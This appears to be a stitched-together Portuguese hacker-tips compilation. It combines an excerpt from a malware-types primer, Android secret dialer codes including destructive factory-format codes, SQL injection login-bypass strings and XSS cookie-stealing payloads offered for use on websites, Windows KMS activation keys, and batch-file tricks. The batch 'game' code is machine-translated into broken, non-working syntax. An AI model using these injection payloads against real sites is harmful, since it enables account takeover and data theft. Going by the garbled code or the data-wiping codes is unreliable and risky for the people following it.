os zumbis executam ento os comandos recebidos, durante o perodo predeterminado
pelo controlador;
quando a ao se encerra, os zumbis voltam a ficar espera dos prximos comandos a
serem executados.
4.4. Spyware
Spyware um programa projetado para monitorar as atividades de um sistema e enviar as
informaes coletadas para terceiros.
Pode ser usado tanto de forma legtima quanto maliciosa, dependendo de como
instalado, das aes realizadas, do tipo de informao monitorada e do uso que feito por
quem recebe as informaes coletadas. Pode ser considerado de uso:
Legtimo: quando instalado em um computador pessoal, pelo prprio dono ou com
consentimento deste, com o objetivo de verificar se outras pessoas o esto utilizando de
modo abusivo ou no autorizado.
Malicioso: quando executa aes que podem comprometer a privacidade do usurio e a
segurana do computador, como monitorar e capturar informaes referentes navegao
do usurio ou inseridas em outros programas (por exemplo, conta de usurio e senha).
Alguns tipos especficos de programas spyware so:
Keylogger: capaz de capturar e armazenar as teclas digitadas pelo usurio no teclado do
computador. Sua ativao, em muitos casos, condicionada a uma ao prvia do
usurio, como o acesso a um site especfico de comrcio eletrnico ou de Internet
Banking.
Screenlogger: similar ao keylogger, capaz de armazenar a posio do cursor e a tela
apresentada no monitor, nos momentos em que o mouse clicado, ou a regio que
circunda a posio onde o mouse clicado. bastante utilizado por atacantes para
capturar as teclas digitadas pelos usurios em teclados virtuais, disponveis principalmente
em sites de Internet Banking.
Adware: projetado especificamente para apresentar propagandas. Pode ser usado para
fins legtimos, quando incorporado a programas e servios, como forma de patrocnio ou
retorno financeiro para quem desenvolve programas livres ou presta servios gratuitos.
Tambm pode ser usado para fins maliciosos, quando as propagandas apresentadas so
direcionadas, de acordo com a navegao do usurio e sem que este saiba que tal
monitoramento est sendo feito.
4.5. Backdoor
Backdoor um programa que permite o retorno de um invasor a um computador
comprometido, por meio da incluso de servios criados ou modificados para este fim.

Pode ser includo pela ao de outros cdigos maliciosos, que tenham previamente
infectado o computador, ou por atacantes, que exploram vulnerabilidades existentes nos
programas instalados no computador para invadi-lo.
Aps includo, o backdoor usado para assegurar o acesso futuro ao computador
comprometido, permitindo que ele seja acessado remotamente, sem que haja necessidade
de recorrer novamente aos mtodos utilizados na realizao da invaso ou infeco e, na
maioria dos casos, sem que seja notado.
A forma usual de incluso de um backdoor consiste na disponibilizao de um novo
servio ou na substituio de um determinado servio por uma verso alterada,
normalmente possuindo recursos que permitem o acesso remoto. Programas de
administrao remota, como BackOrifice, NetBus, SubSeven, VNC e Radmin, se mal
configurados ou utilizados sem o consentimento do usurio, tambm podem ser
classificados como backdoors.
H casos de backdoors includos propositalmente por fabricantes de programas, sob
alegao de necessidades administrativas. Esses casos constituem uma sria ameaa
segurana de um computador que contenha um destes programas instalados pois, alm
de comprometerem a privacidade do usurio, tambm podem ser usados por invasores
para acessarem remotamente o computador.
4.6. Cavalo de troia (Trojan)
Cavalo de troia1, trojan ou trojan-horse, um programa que, alm de executar as funes
para as quais foi aparentemente projetado, tambm executa outras funes, normalmente
maliciosas, e sem o conhecimento do usurio.
Exemplos de trojans so programas que voc recebe ou obtm de sites na Internet e que
parecem ser apenas cartes virtuais animados, lbuns de fotos, jogos e protetores de tela,
entre outros. Estes programas, geralmente, consistem de um nico arquivo e necessitam
ser explicitamente executados para que sejam instalados no computador.
Trojans tambm podem ser instalados por atacantes que, aps invadirem um computador,
alteram programas j existentes para que, alm de continuarem a desempenhar as
funes originais, tambm executem aes maliciosas.
H diferentes tipos de trojans, classificados2 de acordo com as aes maliciosas que
costumam executar ao infectar um computador. Alguns destes tipos so:
Trojan Downloader: instala outros cdigos maliciosos, obtidos de sites na Internet.
Trojan Dropper: instala outros cdigos maliciosos, embutidos no prprio cdigo do trojan.
Trojan Backdoor: inclui backdoors, possibilitando o acesso remoto do atacante ao
computador.
Trojan DoS: instala ferramentas de negao de servio e as utiliza para desferir ataques.
Trojan Destrutivo: altera/apaga arquivos e diretrios, formata o disco rgido e pode deixar o
computador fora de operao.
Trojan Clicker: redireciona a navegao do usurio para sites especficos, com o objetivo
de aumentar a quantidade de acessos a estes sites ou apresentar propagandas.
Trojan Proxy: instala um servidor de proxy, possibilitando que o computador seja utilizado
para navegao annima e para envio de spam.
Trojan Spy: instala programas spyware e os utiliza para coletar informaes sensveis,

como senhas e nmeros de carto de crdito, e envi-las ao atacante.


Trojan Banker ou Bancos: coleta dados bancrios do usurio, atravs da instalao de
programas spyware que so ativados quando sites de Internet Banking so acessados.
similar ao Trojan Spy porm com objetivos mais especficos.
[1] O "Cavalo de Troia", segundo a mitologia grega, foi uma grande esttua, utilizada como
instrumento de guerra pelos gregos para obter acesso cidade de Troia. A esttua do
cavalo foi recheada com soldados que, durante a noite, abriram os portes da cidade
possibilitando a entrada dos gregos e a dominao de Troia. voltar
[2] Esta classificao baseia-se em coletnea feita sobre os nomes mais comumente
usados pelos programas antimalware. voltar
4.7. Rootkit
Rootkit3 um conjunto de programas e tcnicas que permite esconder e assegurar a
presena de um invasor ou de outro cdigo malicioso em um computador comprometido.
O conjunto de programas e tcnicas fornecido pelos rootkits pode ser usado para:
remover evidncias em arquivos de logs (mais detalhes na Seo 7.6 do Captulo
Mecanismos de segurana);
instalar outros cdigos maliciosos, como backdoors, para assegurar o acesso futuro ao
computador infectado;
esconder atividades e informaes, como arquivos, diretrios, processos, chaves de
registro, conexes de rede, etc;
mapear potenciais vulnerabilidades em outros computadores, por meio de varreduras na
rede;
capturar informaes da rede onde o computador comprometido est localizado, pela
interceptao de trfego.
muito importante ressaltar que o nome rootkit no indica que os programas e as tcnicas
que o compe so usadas para obter acesso privilegiado a um computador, mas sim para
mant-lo.
Rootkits inicialmente eram usados por atacantes que, aps invadirem um computador, os
instalavam para manter o acesso privilegiado, sem precisar recorrer novamente aos
mtodos utilizados na invaso, e para esconder suas atividades do responsvel e/ou dos
usurios do computador. Apesar de ainda serem bastante usados por atacantes, os
rootkits atualmente tm sido tambm utilizados e incorporados por outros cdigos
maliciosos para ficarem ocultos e no serem detectados pelo usurio e nem por
mecanismos de proteo.
H casos de rootkits instalados propositalmente por empresas distribuidoras de CDs de
msica, sob a alegao de necessidade de proteo aos direitos autorais de suas obras. A
instalao nestes casos costumava ocorrer de forma automtica, no momento em que um
dos CDs distribudos contendo o cdigo malicioso era inserido e executado. importante
ressaltar que estes casos constituem uma sria ameaa segurana do computador, pois
os rootkits instalados, alm de comprometerem a privacidade do usurio, tambm podem
ser reconfigurados e utilizados para esconder a presena e os arquivos inseridos por
atacantes ou por outros cdigos maliciosos.
[3] O termo rootkit origina-se da juno das palavras "root" (que corresponde conta de
superusurio ou administrador do computador em sistemas Unix) e "kit" (que corresponde

ao conjunto de programas usados para manter os privilgios de acesso desta conta).


voltar
4.8. Preveno
Para manter o seu computador livre da ao dos cdigos maliciosos existe um conjunto de
medidas preventivas que voc precisa adotar. Essas medidas incluem manter os
programas instalados com as verses mais recentes e com todas as atualizaes
disponveis aplicadas e usar mecanismos de segurana, como antimalware e firewall
pessoal.
Alm disso, h alguns cuidados que voc e todos que usam o seu computador devem
tomar sempre que forem manipular arquivos. Novos cdigos maliciosos podem surgir, a
velocidades nem sempre acompanhadas pela capacidade de atualizao dos mecanismos
de segurana.
Informaes sobre os principais mecanismos de segurana que voc deve utilizar so
apresentados no Captulo Mecanismos de segurana. Outros cuidados que voc deve
tomar para manter seu computador seguro so apresentados no Captulo Segurana de
computadores.

Cdigos secretos para telefones Android (HACKER I.D.S.)


1. Informaes completas sobre o seu telefone
*#*#4636#*#*
Este cdigo pode ser usado para obter algumas informaes interessantes sobre o seu
telefone ea bateria. Ele mostra seguintes 4 menus na tela:
informaes do telefone
informaes sobre a bateria
histrico da bateria
estatsticas de utilizao
2. Dados de fbrica redefinir
*#*#7780#*#*
Este cdigo pode ser usado para uma redefinio de dados de fbrica. Ele vai remover as
coisas seguintes:
Configuraes da conta Google armazenados em seu telefone
Sistema e de aplicativos de dados e configuraes
aplicativos baixados
NO vai remover:
Software do sistema atual e pacote de aplicativos
SD card por exemplo, arquivos fotos, arquivos de msica, etc
Nota: Depois de dar este cdigo, voc recebe uma tela de aviso pedindo para clicar em
"Reset telefone" . Ento voc tem a chance de cancelar a sua operao.
3. Formato do telefone Android
*2767*3855#
Pense antes de dar a este cdigo. Este cdigo utilizado para o formato de fbrica. Ele vai

remover todos os arquivos e configuraes, incluindo o armazenamento de memria


interna. Ele tambm vai reinstalar o firmware do telefone.
Nota: Depois de dar este cdigo, no h maneira de cancelar a operao, a menos que
voc remover a bateria do telefone. Ento, pense duas vezes antes de dar este cdigo.
4. Telefone com cmera Atualizao
*#*#34971539#*#*
Este cdigo utilizado para obter informaes sobre a cmera do telefone. Ele mostra
seguintes 4 menus:
Atualizao do firmware da cmera na imagem (No tente essa opo)
Atualizao do firmware da cmera em carto SD
Obter a verso do firmware da cmera
Obter atualizao de firmware
AVISO: Nunca use a primeira opo, caso contrrio seu telefone com cmera ir parar de
funcionar e voc precisa ter o seu telefone para centro de servios para reinstalar o
firmware da cmera.
5. Chamada final / Power
*#*#7594#*#*
Este o meu favorito. Este cdigo pode ser usado para alterar o "End Call / Power" ao
de boto no seu telefone. Ser padro, se voc pressione e segure o boto, ele mostra uma
tela solicitando que voc selecione qualquer opo de modo silencioso, modo avio e
Power off.
Voc pode mudar essa ao usando este cdigo. Voc pode ativar poder direto off neste
boto para que voc no precisa desperdiar seu tempo em selecionar a opo.
6. Copie o arquivo para a criao de backup
*#*#273283*255*663282*#*#*
Este cdigo abre uma tela de cpia de arquivos onde voc pode fazer backup de seus
arquivos de mdia por exemplo, Imagens, som, vdeo e mensagem de voz.
7. modo de servio
*#*#197328640#*#*
Este cdigo pode ser usado para entrar em modo de servio. Voc pode executar vrios
testes e alterar as configuraes no modo de servio.
8. WLAN, GPS e cdigos de teste Bluetooth:
*#*#232339#*#* Ou *#*#526#*#* Ou *#*#528#*#* - WLAN teste (Use boto "Menu" para
comear a vrios testes)
*#*#232338#*#* - Mostra WiFi endereo MAC
*#*#1472365#*#* - Testar GPS
*#*#1575#*#* - Teste Outro GPS
*#*#232331#*#* - Testar Bluetooth
*#*#232337#*# - Mostra o endereo do dispositivo Bluetooth
9. Cdigos para obter informaes sobre a verso do firmware:
*#*#4986*2650468#*#* - PDA, telefone, H / W, RFCallDate
*#*#1234#*#* - PDA e telefone
*#*#1111#*#* - FTA verso SW
*#*#2222#*#* - FTA Verso HW

*#*#44336#*#* - PDA, telefone, CSC, tempo de construo, nmero Changelist


10. Cdigos para lanar vrios testes de fbrica:
*#*#0283#*#* - Loopback de packs
*#*#0*#*#* - LCD testar
*#*#0673#*#* Ou*#*#0289#*#* - Testar Melody
*#*#0842#*#* - Teste de dispositivo (Teste de vibrao e teste de contraluz)
*#*#2663#*#* - Verso da tela de toque
*#*#2664#*#* - Teste de tela de toque
*#*#0588#*#* - Teste do sensor de proximidade
*#*#3264#*#* - RAM verso

Ataques XSS e de SQL InjecT exemplos: ( HACKER I.D.S. )


Esse cdigo de SQL injection inserido no campo de Login ou Username de um site, onde
faz com que ele se autentique como aquele usurio com uma senha qualquer:
or=1 '
)or('a'='a
or=1
')or('1'='1
ora=a
'or'1'='1
e colocado uma senha como: xxx
Esse cdigo Mostra a verso do Banco de Dados de MYSQL, onde user123 conhecido
pelo Hacker: 'user123' or 1=(select @@version)-- ou ' union select @@version,1,1-Vamos ao XSS (inserindo na URL):
Sequestrando Cookies:
'"><script>alert('xss');alert(document.cookie)</script> ou
<script>alert('xss');alert(document.cookie)</script>
Windows serial keys
Windows 7, 8, Server 2008 R2 and Server 2012 use the following keys for KMS activation;
Operating System Edition
Product Key
Windows 8.1
Windows 8.1 Professional
GCRJD-8NW9H-F2CDX-CCM8D-9D6T9
Windows 8.1 Professional N
HMCNV-VVBFX-7HMBH-CTY9B-B4FXY
Windows 8.1 Enterprise
MHF9N-XY6XB-WVXMC-BTDCT-MKKG7

Windows 8.1 Enterprise N


TT4HM-HN7YT-62K67-RGRQJ-JFFXW
Windows 8
Windows 8 Professional
NG4HW-VH26C-733KW-K6F98-J8CK4
Windows 8 Professional N
XCVCF-2NXM9-723PB-MHCB7-2RYQQ
Windows 8 Enterprise
32JNW-9KQ84-P47T8-D8GGY-CWCK7
Windows 8 Enterprise N
JMNMF-RHW7P-DMY6X-RF3DR-X2BQT
Windows 7
Windows 7 Professional
FJ82H-XT6CR-J8D7P-XQJJ2-GPDD4
Windows 7 Professional N
MRPKT-YTG23-K7D7T-X2JMM-QY7MG
Windows 7 Enterprise
33PXH-7Y6KF-2VJC9-XBBR8-HVTHH
Windows 7 Enterprise N
YDRBP-3D83W-TY26F-D46B2-XCKRJ
Windows 7 Enterprise E
C29WB-22CC8-VJ326-GHFJW-H9DH4
Windows Server 2012 R2
Windows Server 2012 R2 Server Standard
D2N9P-3P6X9-2R39C-7RTCD-MDVJX
Windows Server 2012 R2 Datacenter
W3GGN-FT8W3-Y4M27-J84CP-Q3VJ9
Windows Server 2012 R2 Essentials
KNC87-3J2TX-XB4WP-VCPJV-M4FWM
Windows Server 2012
Windows Server 2012 Core
BN3D2-R7TKB-3YPBD-8DRP2-27GG4
Windows Server 2012 Core N
8N2M2-HWPGY-7PGT9-HGDD8-GVGGY
Windows Server 2012 Core Single Language
2WN2H-YGCQR-KFX6K-CD6TF-84YXQ

Windows Server 2012 Core Country Specific


4K36P-JN4VD-GDC6V-KDT89-DYFKP
Windows Server 2012 Server Standard
XC9B7-NBPP2-83J2H-RHMBY-92BT4
Windows Server 2012 Standard Core
XC9B7-NBPP2-83J2H-RHMBY-92BT4
Windows Server 2012 Multipoint Standard
HM7DN-YVMH3-46JC3-XYTG7-CYQJJ
Windows Server 2012 Multipoint Premium
XNH6W-2V9GX-RGJ4K-Y8X6F-QGJ2G
Windows Server 2012 Datacenter
48HP8-DN98B-MYWDG-T2DCC-8W83P
Windows Server 2012 Datacenter Core
48HP8-DN98B-MYWDG-T2DCC-8W83P
Windows Server 2008 R2
Windows Server 2008 R2 HPC Edition
FKJQ8-TMCVP-FRMR7-4WR42-3JCD7
Windows Server 2008 R2 Datacenter
74YFP-3QFB3-KQT8W-PMXWJ-7M648
Windows Server 2008 R2 Enterprise
489J6-VHDMP-X63PK-3K798-CPX3Y
Windows Server 2008 R2 for Itanium-Based Systems
GT63C-RJFQ3-4GMB6-BRFB9-CB83V
Windows Server 2008 R2 Standard
YC6KT-GKW9T-YTKYR-T4X34-R7VHC
Windows Web Server 2008 R2
6TPJF-RBVHG-WBW2R-86QPH-6RTM4
Show permanente arquivos protegidos escondido, escondido por vrus.
Isso um truque de permanente mostra arquivos e pastas que so protegidos escondido:
1. aberto notepad
2. e colar este cdigo
Attrib / d / s-h-s
3. save como. Arquivo bat e coloc-lo em qualquer pasta ou releg que contm escondido

arquivos (mas no na c: drive)


4.-run

Como fazer um jogo em 1 minuto usando notepad


1. aberto notepad
2. e colar este cdigo
@echo off
Cor b0
Cardpio:
Normas laborais fundamentais (cls)
Eco tsehla! Bem vindo ao jogo!
Eco 1) comear!
Eco 2) como jogar
Eco 3) sada :,(
Estabeleamos / p number=
Se % nmero 1 % == goto startgame
Se % nmero 2 % == goto ajudar
Se % nmero 3 % == goto sada
: startgame
Normas laborais fundamentais (cls)
Eco digite seu nome:
Estabeleamos / p name=
Eco aremoz % name %!
Eco querem comear o questionrio? (y / n)
Estabeleamos / p start=
Se % encetam % == goto level1
Se % encetam % == n goto menu
Goto startgame
: ajudar
Normas laborais fundamentais (cls)
Eco pressionar o nmero de a resposta depois aperte enter.
Eco voltar? (y / n)
Estabeleamos / p menugoto=
Se % menugoto % == goto menu

Se % menugoto % == n goto sada


Goto ajudar
Sada:
Goto sada
: level1
Normas laborais fundamentais (cls)
Eco ok, vamos comear.
O que 10 + 10?
Eco 1) 1
Eco 2) 20
Eco 3) 500
Estabeleamos / p answer1=
Se 1 % answer1% == goto wrong1
Se 2 % answer1% == goto correct1
Se 3 % answer1% == goto wrong1
Goto level1
: correct1
Eco tem razo! Prximo nvel? (y / n)
Estabeleamos / p nl1=
Se % nl1% == goto level2
Se % nl1% == n goto menu
Goto correct1
: wrong1
Infelizmente, o que voc estava errado. Retry? (y / n)
Estabeleamos / p wa1=
Se % wa1% == goto level1
Se % wa1% == n goto menu
Goto wrong1
: level2
Normas laborais fundamentais (cls)
O que est no 100 dollar bill?
Eco 1) ben franklin

Eco 2) tommy king


Eco 3) thomas trem
Eco 4) jeff dunham
Estabeleamos / p aa=
Se 1 % aa % == goto correct2
Se 1 % aa % == goto wrong2
Se 1 % aa % == goto wrong2
Se 1 % aa % == goto wrong2
Goto level2
: correct2
Normas laborais fundamentais (cls)
Eco vc ganhar o jogo!
Goto correct2
: wrong2
Normas laborais fundamentais (cls)
O que voc perdeu! Retry game? (y / n)
Estabeleamos / p retry=
Se % retry % == goto level1
Se % retry % == n goto sada
Goto wrong2
3. save como. Arquivo bat
4. corra e aproveite Emoticon smile